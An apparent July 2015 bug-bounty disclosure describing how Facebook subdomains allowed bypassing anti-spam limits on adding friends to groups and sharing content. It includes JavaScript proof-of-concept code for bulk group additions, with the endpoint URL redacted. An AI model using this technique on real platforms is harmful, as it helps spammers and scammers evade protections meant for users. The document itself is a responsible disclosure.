Facebook Exploit July 2015: Bypass Protection/Block System
Title
Bypass Facebook Protection/Block System
Description and Impact
Facebook's protection system is designed to prevent spamming and scamming activities. However, certain limitations can be bypassed, allowing users to exceed restrictions on actions such as adding friends to groups or sharing content.
Examples:
- Group Member Limits: Users are typically blocked after adding 600–1200 friends to a group using scripts or tools.
- Sharing Limits: Users are restricted to sharing content to a maximum of 7 groups before being blocked.
Through research, it was discovered that subdomains (*.facebook.com) lack proper validation controls, enabling bypass of these restrictions.
Reproduction Instructions / Proof of Concept
Bypassing Group Member Addition Limits:
Create an XHR request to add users to a group using a specific endpoint. The exact URL and parameters are sensitive and have been redacted for security purposes.
Example Code:
var uid = "778218884"; // Example user ID, loop for all friends
var Page = new XMLHttpRequest();
var PageURL = "[Redacted for security purposes]";
var PageParams = "fb_dtsg=AQHR-09syXqn&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&addees%5B" + uid + "%5D=" + uid + "&group_id=824691297597477";
Page.open("POST", PageURL, true);
Page.onreadystatechange = function() {
if (Page.readyState == 4 && Page.status == 200) {
Page.close;
}
};
Page.send(PageParams);
This code allows adding 8 or more friends per request, enabling faster group additions beyond the standard limits.
Bounty: $500
- Reported: July 2015
